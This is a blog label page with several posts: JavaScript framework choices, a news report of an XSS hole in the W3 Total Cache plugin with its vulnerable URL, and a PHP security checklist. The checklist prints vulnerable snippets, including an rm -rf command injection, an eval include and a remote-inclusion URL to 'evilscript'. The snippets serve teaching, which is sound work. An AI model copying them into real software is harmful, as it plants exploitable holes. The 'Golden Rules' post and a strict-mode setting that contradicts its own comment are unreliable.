Showing posts with label Tech Updates. Show all posts
Showing posts with label Tech Updates. Show all posts

Moving To Javascript Development

Over the last couple of years there's been a growing trend in web development, this is the moving away from traditional back-end development and more to front-end development using Javascript.
This has been helped by the increase of nodeJS in web applications allowing Javascript to slowly but surely take over the world.
For many years PHP has been the leading web language, whether you like it or not it's market share has always won out for many years. This has now been overtaken by Javascript and it's easy to see why.
It moves away from the traditional web development approach of having to hire
  • Frontend developer - Traditionally just converted PSDs to HTML and CSS
  • Backend developer - PHP, Ruby, ASP.net who will code up the linking of the front-end to server
  • Devops developers - To handle the server construction
  • Mobile developers - Creating the ios and android apps
  • Desktop application developers
In the current day Javascript developers can handle all these areas of development. Frontend development is no longer just processing HTML and CSS you can build the entire product in Javascript. It's used to handle events on your frontend, Javascript then becomes the API to process the data storing in JSON, NodeJS is now your web server and using something like React Native you can create native mobile apps in Javascript.
Now companies no longer have to hire 4 specialist developer positions as these can all be done by a Javascript developer. This shift from hiring 4 specialist developers to hiring 4 Javascript developers will not only massively improve the process of development but the speed of development too. No longer does each stage have to wait for a dependency from another developer in a different section of the app, each developer can cover all areas of the application.
You can see if you're a Javascript developer you have some good years coming to you.
I've been a PHP developer for many years and I can see the direction that the web is heading to be more Javascript development and away from traditional development processes.
So it's time to change my development practises and learn more about Javascript development. I've been using Javascript for over 15 years but have never used Javascript to build an entire website. So the question I ask when learning a new language/process is where do I start? How to I go about learning frontend development with Javascript?

Where To Start With Javascript Development?

This has been the hardest question to answer with Javascript development as there are so many good frameworks out there at the moment, which one do you choose?
This just names a few of the frameworks.
Which one do you choose?
I asked this question on Twitter, but I didn't want to just say what framework should I learn? I did some research and saw that the 2 main frameworks used are Angular or React. As these were the biggest with the largest communities and with the highest job prospects I wanted to go with one of these. Therefore I asked the question which framework should I learn Angular or React?

The replies I had to this tweet were very surprising, there was a mix between Angular and React with React coming slightly ahead. The surprising part was with the amount of people suggesting vue.js over any over framework.
Looking into Vue.js on github you can see how quickly this is gaining popularity and should be taken seriously. But looking at employability the main contenders are between Angular and React.
While searching for a comparison of the two frameworks I found this projectTodoMvc which is a Github repository that builds a simple To-do application using multiple different frameworks, this is a great way of comparing the different frameworks while they're performing the same actions.
To see the code of the React Todo project you can view it here.
To see the code of Angular2 Todo project you can view it here.
To see the code of Vue.js Todo project you can view it here.

Angular Vs React

As I'm not in a good position to compare these two frameworks so I've linked to the resources I used to make my decision.
The main difference between these two is that Angular is a Javascript framework and React is a Javascript library, which means it's the difference between buying a complete computer compared with buying the parts to build your computer.
Going on what I've read in the above articles about both Angular 2 and React, I've decided React is a better framework for me to learn. But then I was thinking about what people were saying on Twitter and how most people replied with VueJs, so I had to consider this in my choice.

VueJs

Vue (pronounced /vjuː/, like view) is a progressive framework for building user interfaces. Unlike other monolithic frameworks, Vue is designed from the ground up to be incrementally adoptable. The core library is focused on the view layer only, and is very easy to pick up and integrate with other libraries or existing projects. On the other hand, Vue is also perfectly capable of powering sophisticated Single-Page Applications when used in combination with modern tooling and supporting libraries.
If you are an experienced frontend developer and want to know how Vue compares to other libraries/frameworks, check out the Comparison with Other Frameworks.
Compared with the other frameworks Vue looks very powerful, easy to learn and fast.
When using a language the size of the community is very important, the more people that use it the easier it is to find support. Looking at the top Javascript frameworks on Github you can see that Vue is gaining a lot of popularity.
As you can see from the image above Vue is 3rd most popular framework on Github behind Angular and React. When you consider the fact that Vue hasn't been around as long as the other two you can see it's going to catch up quickly.
Another point you need to look into when picking a language/framework is the progression of the product, if it hasn't been updated for a couple years then you don't really want to be using it. Vue have recently released version 2 of the framework increasing the speed of the framework.

Laravel

From Laravel 5.3 Vue is being included in the build and will be the focus to creating the front-end of your application. This is just the start of using Vue but this could mean the move away from Blade to be replaced with Vue.
This makes laravel a very good choice to use for the API of your app and use Vue to consume the API.
With Laravel making this move to include it in the build you will see a lot more people taking up Vue for their applications as opposed to React or Angular. For these reasons I've chosen to start learning Vue as I believe in the next coming of years it will gain more and more popularity in front-end development.
What's your opinions on the different frameworks?

High Risk XSS Vulnerability Discovered in W3 Total Cache Plugin

WP Media is reporting a high risk XSS vulnerability in W3 Total Cache that the company learned about from El Rincón de Zerial’s security blog. The plugin is currently active on more than one million WordPress sites.
This particular vulnerability is found within the plugin’s support form that is embedded in the admin, according to WP Media’s description:
This page can be reach directly using a URL with params, then the params will fill the form.
The params are not escaped when printed on the page, leading to an XSS vulnerability.
Example of XSS URL to be avoided: https://example.com/wp-admin/admin.php?page=w3tc_support&request_type=bug_report&request_id=PAYLOAD
Then replace PAYLOAD with a malicious code.
According to Zerial, in order to exploit the vulnerability, an administrator or user with sufficient permissions must have an active session.
Because the threat is already public with no patch available, the vulnerability’s DREAD score ranks it as High Risk. It’s also easily exploitable and could potentially give an attacker the ability to inject code into the admin area and gain access to security tokens, cookies, and private data.
W3 Total Cache was updated six months ago with a fix for two security issues. The last major update, 0.9.4, was released in 2014. After many users began to wonder if the plugin was abandoned, we spoke with author Frederick Townes in March to learn the status of W3 Total Cache. His said that development and other operations have been ongoing and that his team is working towards leaving officially beta and moving towards a 1.0 release. No major updates have been issued and Townes’ company blog has remained silent.
At this point, the only option users have is to disable the plugin or use an account with author or editor permissions instead of the administrator account. The plugin’s author has been contacted about the vulnerability but there is no security update available via WordPress.org yet.

Golden Rules of programming


1 . The AND operator is used when we use (=) and the operator OR is used when we use (!=)
2. True ( || )     False ( && )

Comments urs.

How to Secure PHP Web Applications and Prevent Attacks?

As a developer you must know how to build a secure and bulletproof application. Your duty is to prevent security attacks and secure your application.

Checklist of PHP and Web Security Issues

Make sure you have these items sorted out when deploying your application into production environment:
  1. ✔ Cross Site Scripting (XSS)
  2. ✔ Injections
  3. ✔ Cross Site Request Forgery (XSRF/CSRF)
  4. ✔ Public Files
  5. ✔ Passwords
  6. ✔ Uploading Files
  7. ✔ Session Hijacking
  8. ✔ Remote File Inclusion
  9. ✔ PHP Configuration
  10. ✔ Use HTTPS
  11. ✔ Things Not Listed

Cross Site Scripting (XSS)

XSS attack happens where client side code (usually JavaScript) gets injected into the output of your PHP script.
// GET data is sent through URL: http://example.com/search.php?search=
$search = $_GET['search'] ?? null;
echo 'Search results for '.$search;

// This can be solved with htmlspecialchars
$search = htmlspecialchars($search, ENT_QUOTES, 'UTF-8');
echo 'Search results for '.$search;
  • ENT_QUOTES is used to escape single and double quotes beside HTML entities
  • UTF-8 is used for pre PHP 5.4 environments (now it is default). In some browsers some characters might get pass thehtmlspecialchars().

Injections

SQL Injection

When accessing databases from your application, SQL injection attack can happen by injecting malicious SQL parts into your existing SQL statement.

Directory Traversal (Path Injection)

Directory traversal attack is also known as ../ (dot, dot, slash) attack. It happens where user supplies input file names and can traverse to parent directory. Data can be set as index.php?page=../secret or /var/www/secret or something more catastrophic:
$page = $_GET['page'] ?? 'home';

require $page;
// or something like this
echo file_get_contents('../pages/'.$page.'.php');
In such cases you must check if there are attempts to access parent or some remote folder:
// Checking if the string contains parent directory
if (strstr($_GET['page'], '../') !== false) {
    throw new \Exception("Directory traversal attempt!");
}

// Checking remote file inclusions
if (strstr($_GET['page'], 'file://') !== false) {
    throw new \Exception("Remote file inclusion attempt!");
}

// Using whitelists of pages that are allowed to be included in the first place
$allowed = ['home', 'blog', 'gallery', 'catalog'];
$page = (in_array($page, $allowed)) ? $page : 'home';
echo file_get_contents('../pages/'.$page.'.php');

Command Injection

Be careful when dealing with commands executing functions and data you don’t trust.
exec('rm -rf '.$GET['path']);

Code Injection

Code injection happens when malicious code can be injected in eval() function, so sanitize your data when using it:
eval('include '.$_GET['path']);

Cross Site Request Forgery (XSRF/CSRF)

Cross site request forgery or one click attack or session riding is an exploit where user executes unwanted actions on web applications.

Public Files

Make sure to move all your application files, configuration files and similar parts of your web application in a folder that is not publicly accessible when you visit URL of web application. Some file types (for example .yml files) might not be processed by your web server and user can view them online.
Example of good folder structure:
app/
  config/
    parameters.yml
  src/
public/
  index.php
  style.css
  javascript.js
  logo.png
Configure web server to serve files from public folder instead of your application root folder. Public folder contains the front controller (index.php). In case web server gets misconfigured and fails to serve PHP files properly only source code of index.php will be visible to public.

Passwords

When working with user’s passwords hash them properly with password_hash() function.

Uploading Files

A lot of security breaches happen where users can upload a file on server. Make sure you go through all the vulnerabilities of uploading files such as renaming uploaded file, moving it to publicly unaccessible folder, checking file type and similar. Since there are a lot of issues to check here, more information is located in the separate FAQ:

Session Hijacking

Session hijacking is an attack where attacker steals session ID of a user. Session ID is sent to server where $_SESSION array gets populated based on it. Session hijacking is possible through an XSS attack or if someone gains access to folder on server where session data is stored.

Remote File Inclusion

Remote file inclusion attack (RFI) means that attacker can include custom scripts:
$page = $_GET['page'] ?? 'home'

require $page . '.php';
In above code $_GET can be set to a remote file http://yourdomain.tld/index.php?page=http://example.com/evilscript
Make sure you disable this in your php.ini unless you know what you’re doing:
; Disable including remote files
allow_url_fopen = off
; Disable opening remote files for include(), require() and include_once() functions.
; If above allow_url_fopen is disabled, allow_url_include is also disabled.
allow_url_include = off

PHP Configuration

Always keep installed PHP version updated. You can use versionscan to check for possible vulnerabilities of your PHP version. Update open source libraries and applications and maintain web server.
Here are some of the important settings from php.ini that you should check out. You can also use iniscan to scan your php.ini files for best security practices.

Error Reporting

In your production environment you must always turn off displaying errors to screen. If errors occur in your application and they are visible to the outside world, attacker can get valuable data for attacking your application. display_errors and log_errors directives inphp.ini file:
; Disable displaying errors to screen
display_errors = off
; Enable writing errors to server logs
log_errors = on

Exposing PHP Version

PHP version is visible in HTML headers. You might want to consider hiding PHP version by turning off expose_php directive and prevent web server to send back header X-Powered-By:
expose_php = off

Remote Files

In most cases it is important to disable access to remote files:
; disabled opening remote files for fopen, fsockopen, file_get_contents and similar functions
allow_url_fopen =  0
; disabled including remote files for require, include ans similar functions
allow_url_include = 0

open_basedir

This settings defines one or more directories (subdirectories included) where PHP has access to read and write files. This includes file handling (fopenfile_get_contents) and also including files (includerequire):
open_basedir = "/var/www/test/uploads"

Session Settings

  • session.use_cookies and session.use_only_cookies
    PHP is by default configured to store session data on the server and a tracking cookie on client side (usually called PHPSESSID) with unique ID for the session.
; in most cases you'll want to enable cookies for storing session
session.use_cookies = 1
; disabled changing session id through PHPSESSID parameter (e.g foo.php?PHPSESSID=)
session.use_only_cookies = 1
session.use_trans_sid = 0
; rejects any session ID from user that doesn't match current one and creates new one
session.use_strict_mode = 0
  • session.cookie_httponly
    If the attacker somehow manages to inject Javascript code for stealing user’s current cookies (the document.cookie string), theHttpOnly cookie you’ve set won’t show up in the list.
session.cookie_httponly = 1
  • session.cookie_domain
    This sets the domain for which cookies apply. For wildcard domains you can use .example.com or set this to the domain it should be applied. By default it is not enabled, so it is highly recommended for you to enable it:
session.cookie_domain = example.com
  • session.cookie_secure
    For HTTPS sites this accepts only cookies sent over HTTPS. If you’re still not using HTTPS, you should consider it.
session.cookie_secure = 1

Use HTTPS

HTTPS is a protocol for secure communication over network. It is highly recommended that you enable it on all sites. Read more about HTTPS in the dedicated FAQ: How to Install SSL Certificate and Enable HTTPS.

What is Next?

Above we’ve introduced many security issues. Security, attacks and vulnerabilities are continuously evolving. Take time and check some good resources to learn more about security and turn this check list into a habit: